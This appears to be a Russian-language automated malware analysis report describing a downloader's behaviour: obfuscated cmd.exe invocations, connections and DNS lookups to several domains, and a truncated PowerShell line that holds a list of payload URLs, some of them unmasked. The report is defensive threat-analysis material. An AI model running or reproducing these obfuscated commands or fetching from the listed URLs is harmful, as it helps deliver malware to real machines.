Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps...
Сетевая активность
Подключается к
- 'li##won.com':80
- 'ei####lfahim.com':80
- 'bl##bbw.net':80
TCP
Запросы HTTP GET
- http://www.li##won.com/8vkOTIP
- http://ei####lfahim.com/V8zjSXkk
- http://bl##bbw.net/NXA03DC4
UDP
- DNS ASK li##won.com
- DNS ASK ei####lfahim.com
- DNS ASK vo####ailand.com
- DNS ASK ne#.####siblecreations.nl
- DNS ASK bl##bbw.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe, ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps^er^.v^wq$^(etirw.Qw^...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $anj='zjC';$NWQ='http://www.li##won.com/8vkOTIP@http://eissaalfahim.com/V8zjSXkk@http://volathailand.com/Yh1xviOUJA@http://new.invisiblecreations.nl/bjOS0VQQyU@http://blogbbw.net/NXA03DC4'.Spli...
